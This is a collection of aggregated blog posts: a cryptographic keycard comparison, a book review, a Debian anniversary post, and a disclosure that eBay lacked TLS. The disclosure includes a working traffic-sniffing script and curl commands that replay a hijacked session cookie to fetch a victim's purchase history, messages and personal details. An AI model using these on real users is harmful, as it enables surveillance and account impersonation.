Search Results: "bruce"

17 October 2017

Antoine Beaupré: A comparison of cryptographic keycards

An earlier article showed that private key storage is an important problem to solve in any cryptographic system and established keycards as a good way to store private key material offline. But which keycard should we use? This article examines the form factor, openness, and performance of four keycards to try to help readers choose the one that will fit their needs. I have personally been using a YubiKey NEO, since a 2015 announcement on GitHub promoting two-factor authentication. I was also able to hook up my SSH authentication key into the YubiKey's 2048-bit RSA slot. It seemed natural to move the other subkeys onto the keycard, provided that performance was sufficient. The mail client that I use (Notmuch) blocks when decrypting messages, which could be a serious problem on large email threads from encrypted mailing lists. So I built a test harness and got access to some more keycards: I bought an FST-01 from its creator, Yutaka Niibe, at the last DebConf and Nitrokey donated a Nitrokey Pro. I also bought a YubiKey 4 when I got the NEO. There are of course other keycards out there, but those are the ones I could get my hands on. You'll notice none of those keycards have a physical keypad to enter passwords, so they are all vulnerable to keyloggers that could extract the key's PIN. Keep in mind, however, that even with the PIN, an attacker could only ask the keycard to decrypt or sign material but not extract the key that is protected by the card's firmware.
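For readers who want to follow the same path, moving existing subkeys onto an OpenPGP keycard is done from GnuPG's interactive key editor. A minimal sketch, assuming GnuPG 2.1 and a card that has already been initialized (the key ID is a placeholder):
gpg --edit-key 0xDEADBEEF   # placeholder key ID
gpg> key 1                  # select the subkey to move
gpg> keytocard              # pick the matching card slot when prompted
gpg> save                   # the private part now lives only on the card
Note that keytocard moves the key rather than copying it, so make an offline backup of the secret key before doing this.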

Form factor The Nitrokey Pro, YubiKey NEO (worn out), YubiKey 4, and FST-01 The four keycards have similar form factors: they all connect to a standard USB port, although both YubiKey keycards have a capacitive button by which the user triggers two-factor authentication and the YubiKey 4 can also require a button press to confirm private key use. The YubiKeys feel sturdier than the other two. The NEO has withstood two years of punishment in my pockets along with the rest of my "real" keyring and there is only minimal wear on the keycard in the picture. It's also thinner so it fits well on the keyring. The FST-01 stands out from the other two with its minimal design. Out of the box, the FST-01 comes without a case, so the circuitry is exposed. This is deliberate: one of its goals is to be as transparent as possible, both in terms of software and hardware design, and you definitely get that feeling at the physical level. Unfortunately, that does mean it feels more brittle than other models: I wouldn't carry it in my pocket all the time; there is a case that may protect the key a little better, but it does not provide an easy way to hook it into a keyring. In the group picture above, the FST-01 is the pink plastic thing, which is a rubbery casing I received along with the device when I got it. Notice how the USB connectors of the YubiKeys differ from the other two: while the FST-01 and the Nitrokey have standard USB connectors, the YubiKey has only a "half-connector", which is what makes it thinner than the other two. The "Nano" form factor takes this even further and almost disappears in the USB port. Unfortunately, this arrangement means the YubiKey NEO often comes loose and falls out of the USB port, especially when connected to a laptop. On my workstation, however, it usually stays put even with my whole keyring hanging off of it. I suspect this adds more strain to the host's USB port but that's a tradeoff I've lived with without any noticeable wear so far. Finally, the NEO has this peculiar feature of supporting NFC for certain operations, as LWN previously covered, but I haven't used that feature yet. The Nitrokey Pro looks like a normal USB key, in contrast with the other two devices. It does feel a little brittle when compared with the YubiKey, although only time will tell how much of a beating it can take. It has a small ring in the case so it is possible to carry it directly on your keyring, but I would be worried the cap would come off eventually. Nitrokey devices are also two times thicker than the Yubico models which makes them less convenient to carry around on keyrings.

Open and closed designs The FST-01 is as open as hardware comes, down to the PCB design available as KiCad files in this Git repository. The software running on the card is the Gnuk firmware that implements the OpenPGP card protocol, but you can also get it with firmware implementing a true random number generator (TRNG) called NeuG (pronounced "noisy"); the device is programmable through a standard Serial Wire Debug (SWD) port. The Nitrokey Start model also runs the Gnuk firmware. However, the Nitrokey website announces only ECC and RSA 2048-bit support for the Start, while the FST-01 also supports RSA-4096. Nitrokey's founder Jan Suhr, in a private email, explained that this is because "Gnuk doesn't support RSA-3072 or larger at a reasonable speed". Its devices (the Pro, Start, and HSM models) use a similar chip to the FST-01: the STM32F103 microcontroller. Nitrokey Pro with STM32F103TBU6 MCU Nitrokey also publishes its hardware designs on GitHub, which show the Pro is basically a fork of the FST-01, according to the ChangeLog. I opened the case to confirm it was using the STM MCU, something I should warn you against; I broke one of the pins holding it together when opening it so now it's even more fragile. But at least I was able to confirm it was built using the STM32F103TBU6 MCU, like the FST-01. Nitrokey back side But this is where the comparison ends: on the back side, we find a SIM card reader that holds the OpenPGP card that, in turn, holds the private key material and does the cryptographic operations. So, in effect, the Nitrokey Pro is really an evolution of the original OpenPGP card readers. Nitrokey confirmed the OpenPGP card featured in the Pro is the same as the one shipped by the Free Software Foundation Europe (FSFE): the BasicCard built by ZeitControl. Those cards, however, are covered by NDAs and the firmware is only partially open source. This makes the Nitrokey Pro less open than the FST-01, but that's an inevitable tradeoff when choosing a design based on the OpenPGP cards, which Suhr described to me as "pretty proprietary". There are other keycards out there, however, for example the SLJ52GDL150-150k smartcard suggested by Debian developer Yves-Alexis Perez, which he prefers as it is certified by French and German authorities. In that blog post, he also said he was experimenting with the GPL-licensed OpenPGP applet implemented by the French ANSSI. But the YubiKey devices are even further away in the closed-design direction. Both the hardware designs and firmware are proprietary. The YubiKey NEO, for example, cannot be upgraded at all, even though it is based on an open firmware. According to Yubico's FAQ, this is due to "best security practices": "There is a 'no upgrade' policy for our devices since nothing, including malware, can write to the firmware." I find this decision questionable in a context where security updates are often more important than trying to achieve a bulletproof design, which may simply be impossible. And the YubiKey NEO did suffer from a critical security issue that allowed attackers to bypass the PIN protection on the card, which raises the question of the actual protection of the private key material on those cards. According to Niibe, "some OpenPGP cards store the private key unencrypted. It is a common attitude for many smartcard implementations", which was confirmed by Suhr: "the private key is protected by hardware mechanisms which prevent its extraction and misuse". He is referring to the use of tamper resistance.
After that security issue, there was no other option for YubiKey NEO users than to get a new keycard (for free, thankfully) from Yubico, which also meant discarding the private key material on the key. For OpenPGP keys, this may mean having to bootstrap the web of trust from scratch if the keycard was responsible for the main certification key. But at least the NEO is running free software based on the OpenPGP card applet and the source is still available on GitHub. The YubiKey 4, on the other hand, is now closed source, which was controversial when the new model was announced last year. It led the main Linux Foundation system administrator, Konstantin Ryabitsev, to withdraw his endorsement of Yubico products. In response, Yubico argued that this approach was essential to the security of its devices, which are now based on "a secure chip, which has built-in countermeasures to mitigate a long list of attacks". In particular, it claims that:
A commercial-grade AVR or ARM controller is unfit to be used in a security product. In most cases, these controllers are easy to attack, from breaking in via a debug/JTAG/TAP port to probing memory contents. Various forms of fault injection and side-channel analysis are possible, sometimes allowing for a complete key recovery in a shockingly short period of time.
While I understand those concerns, they eventually come down to the trust you have in an organization. Not only do we have to trust Yubico, but also the hardware manufacturers and the designs they have chosen. Every step in the hidden supply chain is then trusted to make correct technical decisions and not introduce any backdoors. History, unfortunately, is not on Yubico's side: Snowden revealed the example of RSA Security accepting what renowned cryptographer Bruce Schneier described as a "bribe" from the NSA to weaken its ECC implementation, by using the presumably backdoored Dual_EC_DRBG algorithm. What makes Yubico or its suppliers so different from RSA Security? Remember that RSA Security used to be an adamant opponent of the degradation of encryption standards, campaigning against the Clipper chip in the first crypto wars. Even if we trust the Yubico supply chain, how can we trust a closed design using what basically amounts to security through obscurity? Publicly auditable designs are an important tradition in cryptography, and that principle shouldn't stop when software is frozen into silicon. In fact, a critical vulnerability called ROCA, disclosed recently, affects closed "smartcards" like the YubiKey 4 and allows full private key recovery from the public key if the key was generated on a vulnerable keycard. When speaking with Ars Technica, the researchers outlined the importance of open designs and questioned the reliability of certification:
Our work highlights the dangers of keeping the design secret and the implementation closed-source, even if both are thoroughly analyzed and certified by experts. The lack of public information causes a delay in the discovery of flaws (and hinders the process of checking for them), thereby increasing the number of already deployed and affected devices at the time of detection.
This issue with open hardware designs seems to be a recurring topic of conversation on the Gnuk mailing list. For example, there was a discussion in September 2017 regarding possible hardware vulnerabilities in the STM MCU that would allow extraction of encrypted key material from the key. Niibe referred to a talk presented at the WOOT 17 workshop, where Johannes Obermaier and Stefan Tatschner, from the Fraunhofer Institute, demonstrated attacks against the STMF0 family MCUs. It is still unclear if those attacks also apply to the older STMF1 design used in the FST-01, however. Furthermore, extracted private key material is still protected by the user's passphrase, but Gnuk uses a weak key derivation function, so brute-forcing attacks may be possible. Fortunately, there is work in progress to make GnuPG hash the passphrase before sending it to the keycard, which should make such attacks harder if not completely pointless. When asked about the Yubico claims in a private email, Niibe did recognize that "it is true that there are more weak points in general purpose implementations than special implementations". During the last DebConf in Montreal, Niibe explained:
If you don't trust me, you should not buy from me. Source code availability is only a single factor: someone can maliciously replace the firmware to enable advanced attacks.
Niibe recommends that you "build the firmware yourself", also saying the design of the FST-01 uses normal hardware that "everyone can replicate". Those advantages are hard to deny for a cryptographic system: using more generic components makes it harder for hostile parties to mount targeted attacks. A counter-argument here is that it can be difficult for a regular user to audit such designs, let alone physically build the device from scratch. But, in a mailing list discussion, Debian developer Ian Jackson explained that:
You don't need to be able to validate it personally. The thing spooks most hate is discovery. Backdooring supposedly-free hardware is harder (more costly) because it comes with greater risk of discovery. To put it concretely: if they backdoor all of them, someone (not necessarily you) might notice. (Backdooring only yours involves messing with the shipping arrangements and so on, and supposes that you specifically are of interest.)
Since, as far as we know, the STM microcontrollers are not backdoored, I would tend to favor those devices over proprietary ones, as such a backdoor would be more easily detectable than in a closed design. Even though physical attacks may be possible against those microcontrollers, in the end, if an attacker has physical access to a keycard, I consider the key compromised, even if it has the best chip on the market. In our email exchange, Niibe argued that "when a token is lost, it is better to revoke keys, even if the token is considered secure enough". So like any other device, physical compromise of tokens may mean compromise of the key and should trigger key-revocation procedures.

Algorithms and performance To establish reliable performance results, I wrote a benchmark program naively called crypto-bench that could produce comparable results between the different keys. The program takes each algorithm/keycard combination and runs 1000 decryptions of a 16-byte file (one AES-128 block) using GnuPG, after priming it to get the password cached. I assume the overhead of GnuPG calls to be negligible, as it should be the same across all tokens, so comparisons are possible. AES encryption is constant across all tests as it is always performed on the host and fast enough to be irrelevant in the tests. I used the following:
  • Intel(R) Core(TM) i3-6100U CPU @ 2.30GHz running Debian 9 ("stretch"/stable amd64), using GnuPG 2.1.18-6 (from the stable Debian package)
  • Nitrokey Pro 0.8 (latest firmware)
  • FST-01, running Gnuk version 1.2.5 (latest firmware)
  • YubiKey NEO OpenPGP applet 1.0.10 (not upgradable)
  • YubiKey 4 4.2.6 (not upgradable)
I ran crypto-bench for each keycard, which resulted in the following:
Algorithm         Device         Mean time (s)
ECDH-Curve25519   CPU            0.036
                  FST-01         0.135
RSA-2048          CPU            0.016
                  YubiKey-4      0.162
                  Nitrokey-Pro   0.610
                  YubiKey-NEO    0.736
                  FST-01         1.265
RSA-4096          CPU            0.043
                  YubiKey-4      0.875
                  Nitrokey-Pro   3.150
                  FST-01         8.218
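The crypto-bench harness itself is not reproduced here, but the measurement it performs can be approximated in a few lines of shell. This is only a sketch under the assumptions described above (a 16-byte plaintext, a primed password cache, 1000 iterations); the file names and the key ID are placeholders:
head -c 16 /dev/urandom > block.bin
gpg --encrypt --recipient 0xDEADBEEF --output block.gpg block.bin
gpg --quiet --decrypt block.gpg > /dev/null   # prime the passphrase/PIN cache
time for i in $(seq 1000); do
    gpg --quiet --decrypt block.gpg > /dev/null
done
Dividing the total wall-clock time by 1000 gives a mean time per decryption comparable to the table above.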
Decryption graph There we see the performance of the four keycards I tested, compared with the same operations done without a keycard: the "CPU" device. That provides the baseline time of GnuPG decrypting the file. The first obvious observation is that using a keycard is slower: in the best scenario (FST-01 + ECC) we see a four-fold slowdown, but in the worst case (also FST-01, but RSA-4096), we see a catastrophic 200-fold slowdown. When I presented the results on the Gnuk mailing list, GnuPG developer Werner Koch confirmed those "numbers are as expected":
With a crypto chip RSA is much faster. By design the Gnuk can't be as fast - it is just a simple MCU. However, using Curve25519 Gnuk is really fast.
And yes, the FST-01 is really fast at doing ECC, but it's also the only keycard that handles ECC in my tests; the Nitrokey Start and Nitrokey HSM should support it as well, but I haven't been able to test those devices. Also note that the YubiKey NEO doesn't support RSA-4096 at all, so we can only compare RSA-2048 across keycards. We should note, however, that ECC is slower than RSA on the CPU, which suggests the Gnuk ECC implementation used by the FST-01 is exceptionally fast. In discussions about improving the performance of the FST-01, Niibe estimated the user tolerance threshold to be "2 seconds decryption time". In a new design using the STM32L432 microcontroller, Aurelien Jarno was able to bring the numbers for RSA-2048 decryption from 1.27s down to 0.65s, and for RSA-4096, from 8.22s down to 3.87s. RSA-4096 is still beyond the two-second threshold, but at least it brings the FST-01 close to the YubiKey NEO and Nitrokey Pro performance levels. We should also underline the superior performance of the YubiKey 4: whatever that thing is doing, it's doing it faster than anyone else. It does RSA-4096 faster than the FST-01 does RSA-2048, and almost as fast as the Nitrokey Pro does RSA-2048. We should also note that the Nitrokey Pro fails to cross the two-second threshold for RSA-4096 decryption. For me, the FST-01's stellar performance with ECC outshines the other devices. Maybe it says more about the efficiency of the algorithm than the FST-01 or Gnuk's design, but it's definitely an interesting avenue for people who want to deploy those modern algorithms. So, in terms of performance, it is clear that both the YubiKey 4 and the FST-01 take the prize in their own areas (RSA and ECC, respectively).

Conclusion In the above presentation, I have evaluated four cryptographic keycards for use with various OpenPGP operations. What the results show is that the only efficient way of storing a 4096-bit encryption key on a keycard would be to use the YubiKey 4. Unfortunately, I do not feel we should put our trust in such closed designs, so I would argue you should either stick with 2048-bit encryption subkeys or keep the keys on disk. Considering that losing such a key would be catastrophic, this might be a good approach anyway. You should also consider switching to ECC encryption: even though it may not be supported everywhere, GnuPG supports having multiple encryption subkeys on a keyring: if one algorithm is unsupported (e.g. GnuPG 1.4 doesn't support ECC), it will fall back to a supported algorithm (e.g. RSA). Do not forget your previously encrypted material doesn't magically re-encrypt itself using your new encryption subkey, however. For authentication and signing keys, speed is not such an issue, so I would warmly recommend either the Nitrokey Pro or Start, or the FST-01, depending on whether you want to start experimenting with ECC algorithms. Availability also seems to be an issue for the FST-01. While you can generally get the device when you meet Niibe in person for a few bucks (I bought mine for around $30 Canadian), the Seeed online shop says the device is out of stock at the time of this writing, even though Jonathan McDowell said that may be inaccurate in a debian-project discussion. Nevertheless, this issue may make the Nitrokey devices more attractive. When deciding on using the Pro or Start, Suhr offered the following advice:
In practice smart card security has been proven to work well (at least if you use a decent smart card). Therefore the Nitrokey Pro should be used for high security cases. If you don't trust the smart card or if Nitrokey Start is just sufficient for you, you can choose that one. This is why we offer both models.
So far, I have created a signing subkey and moved that and my authentication key to the YubiKey NEO, because it's a device I physically trust to keep itself together in my pockets and I was already using it. It has served me well so far, especially with its extra features like U2F and HOTP support, which I use frequently. Those features are also available on the Nitrokey Pro, so that may be an alternative if I lose the YubiKey. I will probably move my main certification key to the FST-01 and a LUKS-encrypted USB disk, to keep that certification key offline but backed up on two different devices. As for the encryption key, I'll wait for keycard performance to improve, or simply switch my whole keyring to ECC and use the FST-01 or Nitrokey Start for that purpose.
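If you do experiment with an additional ECC encryption subkey alongside an existing RSA one, as suggested in the conclusion above, recent GnuPG versions can add it non-interactively. This is only a sketch, assuming GnuPG 2.1.13 or later; the fingerprint is a placeholder:
# add a Curve25519 encryption subkey next to the existing RSA subkeys
gpg --quick-add-key 0123456789ABCDEF0123456789ABCDEF01234567 cv25519 encr
Clients that lack ECC support should keep using the RSA encryption subkey, as described above.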
[The author would like to thank Nitrokey for providing hardware for testing.] This article first appeared in the Linux Weekly News.

1 July 2017

Russ Allbery: Review: Make It Stick

Review: Make It Stick, by Peter C. Brown, et al.
Author: Peter C. Brown
Author: Henry L. Roediger III
Author: Mark A. McDaniel
Publisher: Belknap Press
Copyright: 2014
ISBN: 0-674-72901-3
Format: Kindle
Pages: 255
Another read for the work book club. "People generally are going about learning in the wrong ways." This is the first sentence of the preface of this book by two scientists (Roediger and McDaniel are both psychology researchers specializing in memory) and a novelist and former management consultant (Brown). The goal of Make It Stick is to apply empirical scientific research to the problem of learning, specifically retention of information for long-term use. The authors aim to convince the reader that subjective impressions of the effectiveness of study habits are highly deceptive, and that scientific evidence points strongly towards mildly counter-intuitive learning methods that don't feel like they're producing as good of results. I have such profound mixed feelings about this book. Let's start with the good. Make It Stick is a book containing actual science. The authors quote the studies, results, and scientific argument at length. There are copious footnotes and an index, as well as recommended reading. And the science is concrete and believable, as is the overlaid interpretation based on cognitive and memory research. The book's primary argument is that short-term and long-term memory are very different things, that what we're trying to achieve when we say "learning" is based heavily on long-term memory and recall of facts for an extended time after study, and that building this type of recall requires not letting our short-term memory do all the work. We tend towards study patterns that show obvious short-term improvement and that produce an increased feeling of effortless recall of the material, but those study patterns are training short-term memory and mean the knowledge slips away quickly. Choosing learning methods that instead make us struggle a little with what we're learning is significantly better. It's that struggle that leads to committing the material to long-term memory and building good recall pathways for it. On top of this convincingly-presented foundation, the authors walk through learning methods that feel worse in the moment but have better long-term effects: mixing practice of different related things (different types of solids when doing geometry problems, different pitches in batting practice) and switching types before you've mastered the one you're working on, forcing yourself to interpret and analyze material (such as writing a few paragraphs of summary in your own words) instead of re-reading it, and practicing material at spaced intervals far enough apart that you've forgotten some of the material and have to struggle to recall it. Possibly the most useful insight here (at least for me) was the role of testing in learning, not as just a way of measuring progress, but as a learning tool. Frequent, spaced, cumulative testing forces exactly the type of recall that builds long-term memory. The tests themselves help improve our retention of what we're learning. It's bad news for people like me who were delighted to leave school and not have to take a test again, but viewing tests as a more effective learning tool than re-reading and review (which they are) does cast them in a far more positive light. This is all solid stuff, and I'm very glad the research underlying this book exists and that I now know about it. But there are some significant problems with its presentation. The first is that there just isn't much here. The two long paragraphs above summarize nearly all of the useful content of this book.
The authors certainly provide more elaboration, and I haven't talked about all of the study methods they mention or some of the useful examples of their application. But 80% of it is there, and the book is intentionally repetitive (because it tries to follow the authors' advice on learning theory). Make It Stick therefore becomes tedious and boring, particularly in the first four chapters. I was saying a lot of "yes, yes, you said that already" and falling asleep while trying to read it. The summaries at the end of the book are a bit better, but you will probably not need most of this book to get the core ideas. And then there's chapter five, which ends in a train wreck. Chapter five is on cognitive biases, and I see why the authors wanted to include it. The Dunning-Kruger effect is directly relevant to their topic. It undermines our ability to learn, and is yet another thing that testing helps avoid. Their discussion of Daniel Kahneman's two system theory (your fast, automatic, subconscious reactions and your slow, thoughtful, conscious processing) is somewhat less directly relevant, but it's interesting stuff, and it's at least somewhat related to the short-term and long-term memory dichotomy. But some of the stories they choose to use to illustrate this are... deeply unfortunate. Specifically, the authors decided to use US police work in multiple places as their example of choice for two-system thinking, and treat it completely uncritically. Some of you are probably already wincing because you can see where this is going. They interview a cop who, during scenario training for traffic stops, was surprised by the car trunk popping open and a man armed with a shotgun popping out of it. To this day, he still presses down on the trunk of the car as he walks up; it's become part of his checklist for every traffic stop. This would be a good example if the authors realized how badly his training has failed and deconstructed it, but they're apparently oblivious. I wanted to reach into the book and shake them. People have a limited number of things they can track and follow as part of a procedure, and some bad trainer has completely wasted part of this cop's attention in every traffic stop and thereby made him less safe! Just calculate the chances that someone would be curled up in an unlocked trunk with a shotgun and a cop would just happen to stop that car for some random reason, compared to any other threat the cop could use that same attention to watch for. This is exactly the type of scenario that's highly memorable but extremely improbable and therefore badly breaks human risk analysis. It's what Bruce Schneier calls a movie plot threat. The correct reaction to movie plot threats is to ignore them; wasting effort on mitigating them means not having that effort to spend on mitigating some other less memorable but more likely threat. This isn't the worst, though. The worst is the very next paragraph, also from police training, of showing up at a domestic call, seeing an armed person on the porch who stands up and walks away when ordered to drop their weapon, and not being sure how to react, resulting in that person (in the simulated exercise) killing the cop before they did anything. The authors actually use this as an example of how the cop was using system two and needed to train to use system one in that situation to react faster, and that this is part of the point of the training. 
Those of us who have been paying attention to the real world know what using system one here means: the person on the porch gets shot if they're black and doesn't get shot if they're white. The authors studiously refuse to even hint at this problem. I would have been perfectly happy if this book avoided the unconscious bias aspect of system one thinking. It's a bit far afield of the point of the book, and the authors are doubtless trying to stay apolitical. But that's why you pick some other example. You cannot just drop this kind of thing on the page and then refuse to even comment on it! It's like writing a chapter about the effect of mass transit on economic development, choosing Atlanta as one of your case studies, and then never mentioning race. Also, some editor seriously should have taken an ax to the sentence where the authors (for no justified reason) elaborate a story to describe a cop maiming a person, solely to make a cliched joke about how masculinity is defined by testicles and how people who lose body parts are less human. Thanks, book. This was bad enough that it dominated my memory of this chapter, but, reviewing the book for this review, I see it was just a few badly chosen examples at the end of the chapter and one pointless story at the start. The rest of the chapter is okay, although it largely summarizes things covered better in other books. The most useful part that's relevant to the topic of the book is probably the discussion of peer instruction. Just skip over all the police bits; you won't be missing anything. Thankfully, the rest of the book mostly avoids failing quite this hard. Chapter six does open with the authors obliviously falling for a string of textbook examples of survivorship bias (immediately after the chapter on cognitive biases!), but they shortly thereafter settle down to the accurate and satisfying work of critiquing theories of learning methods and types of intelligence. And by critiquing, I mean pointing out that they're mostly unscientific bullshit, which is fighting the good fight as far as I'm concerned. So, mixed feelings. The science seems solid, and is practical and directly applicable to my life. Make It Stick does an okay job at presenting it, but gets tedious and boring in places, particularly near the beginning. And there are a few train-wreck examples that had me yelling at the book and scribbling notes, which wasn't really the cure for boredom I was looking for. I recommend being aware of this research, and I'm glad the authors wrote this book, but I can't really recommend the book itself as a reading experience. Rating: 6 out of 10

10 December 2016

Iain R. Learmonth: The Internet of Dangerous Auction Sites

It might be that the internet era of fun and games is over, because the internet is now dangerous. -- Bruce Schneier
Ok, I know this is kind of old news now, but Bruce Schneier gave testimony to the House of Representatives Energy & Commerce Committee about computer security after the Dyn attack. I'm including this quote because I feel it sets the scene nicely for what follows here. Last week, I was browsing the popular online auction site eBay and I noticed that there was no TLS. For a moment, I considered that maybe my traffic was being intercepted deliberately; surely there's no way that eBay, as a global company, would be deliberately risking its users in this way. I was wrong. There is not, and has never been, TLS for large swathes of the eBay site. In fact, the only point at which I've found TLS is in their help pages and when it comes to entering card details (although it'll give you back the last 4 digits of your card over a plaintext channel).
sudo apt install wireshark
# You'll want to allow non-root users to perform capture
sudo adduser `whoami` wireshark
# Log out and in again to assume the privileges you've granted yourself
What can you see? The first thing I'd like to call eBay on is a statement in their webpage about Cookies, Web Beacons, and Similar Technologies:
We don't store any of your personal information on any of our cookies or other similar technologies.
Well eBay, I don't know about you, but for me my name is personal information. Ana, who investigated this with me, also confirmed that her name was present on her cookie when using her account. But to answer the question, you can see pretty much everything. Using the Observer module of PATHspider, which is essentially a programmable flow meter, let's take a look at what items users of the network are browsing:
sudo apt install pathspider
The following is a Python 3 script that you'll need to run as root (for packet capturing) and will need to kill with ^C when you're done, because I didn't give it an exit condition:
import logging
import queue
import threading
import email
import re
from io import StringIO
import plt
from pathspider.observer import Observer
from pathspider.observer import basic_flow
from pathspider.observer.tcp import tcp_setup
from pathspider.observer.tcp import tcp_handshake
from pathspider.observer.tcp import tcp_complete
def tcp_reasm_setup(rec, ip):
        rec['payload'] = b''
        return True
def tcp_reasm(rec, tcp, rev):
        if not rev and tcp.payload is not None:
                rec['payload'] += tcp.payload.data
        return True
lturi = "int:wlp3s0" # CHANGE THIS TO YOUR NETWORK INTERFACE
logging.getLogger().setLevel(logging.INFO)
logger = logging.getLogger(__name__)
ebay_itm = re.compile("(?:item=|itm(?:\/[^0-9][^\/]+)?\/)([0-9]+)")
o = Observer(lturi,
             new_flow_chain=[basic_flow, tcp_setup, tcp_reasm_setup],
             tcp_chain=[tcp_handshake, tcp_complete, tcp_reasm])
q = queue.Queue()
t = threading.Thread(target=o.run_flow_enqueuer,
                     args=(q,),
                     daemon=True)
t.start()
while True:
    f = q.get()
    # www.ebay.co.uk uses keep alive for connections, multiple requests
    # may be in a single flow
    requests = [x + b'\r\n' for x in f['payload'].split(b'\r\n\r\n')]
    for request in requests:
        if request.startswith(b'GET '):
            request_text = request.decode('ascii')
            request_line, headers_alone = request_text.split('\r\n', 1)
            headers = email.message_from_file(StringIO(headers_alone))
            if headers['Host'] != "www.ebay.co.uk":
                break
            itm = ebay_itm.search(request_line)
            if itm is not None and len(itm.groups()) > 0 and itm.group(1) is not None:
                logging.info("%s viewed item %s", f['sip'],
                             "http://www.ebay.co.uk/itm/" + itm.group(1))
Note: PATHspider's Observer won't emit a flow until it is completed, so you may have to close your browser in order for the TCP connection to be closed, as eBay does use Connection: keep-alive. If all is working correctly (if it was really working correctly, it wouldn't be working because the connections would be encrypted, but you get what I mean), you'll see something like:
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/161990905666
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/311756208540
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/131911806454
INFO:root:172.22.152.137 viewed item http://www.ebay.co.uk/itm/192045666116
It is left as an exercise to the reader to map the IP addresses to users. You do however have the hint that the first name of the user is in the cookie. This was a very simple example; you can also passively sniff the content of messages sent and received on eBay (though I'll admit email has the same flaw in a large number of cases) and you can also see the purchase history and cart contents when those screens are viewed. Ana also pointed out that when you browse for items at home, eBay may recommend you similar items and then those recommendations would also be available to anyone viewing the traffic at your workplace. Perhaps you want to see the purchase history but you're too impatient to wait for the user to view the purchase history screen. Don't worry, this is also possible. Three researchers from the Department of Computer Science at Columbia University, New York published a paper earlier this year titled The Cracked Cookie Jar: HTTP Cookie Hijacking and the Exposure of Private Information. In this paper, they talk about hijacking cookies using packet capture tools and then using the cookies to impersonate users when making requests to websites. They also detail in this paper a number of concerning websites that are vulnerable, including eBay. Yes, it's 2016, nearly 2017, and cookie hijacking is still a thing. You may remember Firesheep, a Firefox plugin, that could be used to hijack Facebook, Twitter, Flickr and other websites. It was released in October 2010 as a demonstration of the security risk of session hijacking vulnerabilities to users of web sites that only encrypt the login process and not the cookie(s) created during the login process. Six years later and eBay has not yet listened. So what is cookie hijacking all about? Let's get hands-on. This time, instead of looking at the request line, look at the Cookie header. Just dump that out. Something like:
print(headers['Cookie'])
Now you have the user's cookie and you can impersonate that user. Store the cookie in an environment variable named COOKIE and
sudo apt install curl
# Get the purchase history
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/PurchaseHistory > history.html
# Get the current cart contents
curl --cookie "$COOKIE" http://cart.payments.ebay.co.uk/sc/view > cart.html
# Get the current bids/offers
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/BidsOffers > bids.html
# Get the messages list
curl --cookie "$COOKIE" http://mesg.ebay.co.uk/mesgweb/ViewMessages/0 > messages.html
# Get the watch list
curl --cookie "$COOKIE" http://www.ebay.co.uk/myb/WatchList > watch.html
I'm sure you can use your imagination for more. One of my favourites is
# Get the personal information
curl --cookie "$COOKIE" "http://my.ebay.co.uk/ws/eBayISAPI.dll?MyeBay&CurrentPage=MyeBayPersonalInfo&gbh=1&ssPageName=STRK:ME:LNLK" > personal.html
This one will give you the secret questions (but not the answers) and the last 4 digits of the registered card for a seller account. In the case of Mat Honan in 2012, the last 4 digits of his card number led to the loss of his Twitter account. The techniques I've shown here do not seem to care where the request comes from. We tested using my cookie from Ana's laptop and also tried from a server hosted in the US (our routing origin is in Germany so this should have perhaps been a red flag). I could not find any interface through which I could query my login history, so I'm not sure what it would have shown. I'm not a security researcher, though I do work as an Internet Engineering researcher. I'm publishing this as these vulnerabilities have already been disclosed in the paper I linked above and I believe this is something that needs attention. Every time I pointed out to someone that eBay does not use TLS over the last week they were surprised, and often horrified. You might think that better validation of the source of the cookie might help, for instance, rejecting requests that suddenly come from other countries. As long as the attacker is on the path they have the ability to create flows that impersonate the host at the network layer. The only option here is to encrypt the flow and to ensure a means of authenticating the server, which is exactly what TLS provides. You might think that such attacks may never occur, but active probes in response to passive measurements have been observed. I would think that having all these cookies floating around the Internet is really just an invitation for those cookies to be abused by some intelligence service (or criminal organisation). I would be very surprised if such ideas had not already been explored, if not implemented, on a large scale. Please Internet, TLS already.

31 October 2016

Steve McIntyre: Twenty years...

So, it's now been twenty years since I became a Debian Developer. I couldn't remember the exact date I signed up, but I decided to do some forensics to find out. First, I can check on the dates on my first Debian system, as I've kept it running as a Debian system ever since!
jack:~$ ls -alt /etc
...
-rw-r--r--   1 root   root     6932 Feb 10  1997 pine.conf.old
-rw-r--r--   1 root   root     6907 Dec 29  1996 pine.conf.old2
-rw-r--r--   1 root   root    76739 Dec  7  1996 mailcap.old
-rw-r--r--   1 root   root     1225 Oct 20  1996 fstab.old
jack:~$
I know that I did my first Debian installation in late October 1996, migrating over from my existing Slackware installation with the help of my friend Jon who was already a DD. That took an entire weekend and it was painful, so much so that several times that weekend I very nearly bailed and went back. But, I stuck with it and after a few more days I decided I was happier with Debian than with the broken old Slackware system I'd been using. That last file (fstab.old) is the old fstab file from the Slackware system, backed up just before I made the switch. I was already a software developer at the time, so of course the first thing I wanted to do once I was happy with Debian was to become a DD and take over the Debian maintenance of mikmod, the module player I was working on at the time. So, I mailed Bruce to ask for an account (there was none of this NM concept back then!) and I think he replied the next day. Unfortunately, I don't have the email in my archives any more due to a disk crash back in the dim and distant past. But I can see that the first PGP key I generated for the sake of joining Debian dates from October 30th 1996, which gives me a date of 31st October 1996 for joining Debian. Twenty years, wow... Since then, I've done lots in the project. I'm lucky enough to have been to 11 DebConfs, hosted all around the world. I'm massively proud to have been voted DPL for two of those twenty years. I've worked on a huge number of different things in Debian, from the audio applications I started with to the installer (yay, how things come back to bite you!), from low-level CD and DVD tools (and making our CD images!) to a wiki engine written in Python. I've worked hard to help make the best Operating System on the planet, both for my own sake and the sake of our users. Debian has been both excellent fun and occasionally a huge cause of stress in my life for the last 20 years, but despite the latter I wouldn't go back and change anything. Why? Through Debian, I've made some great friends: in Cambridge, in the UK, in Europe, on every continent. Thanks to you all, and here's to (hopefully) many years to come!

2 October 2016

Russell Coker: Hostile Web Sites

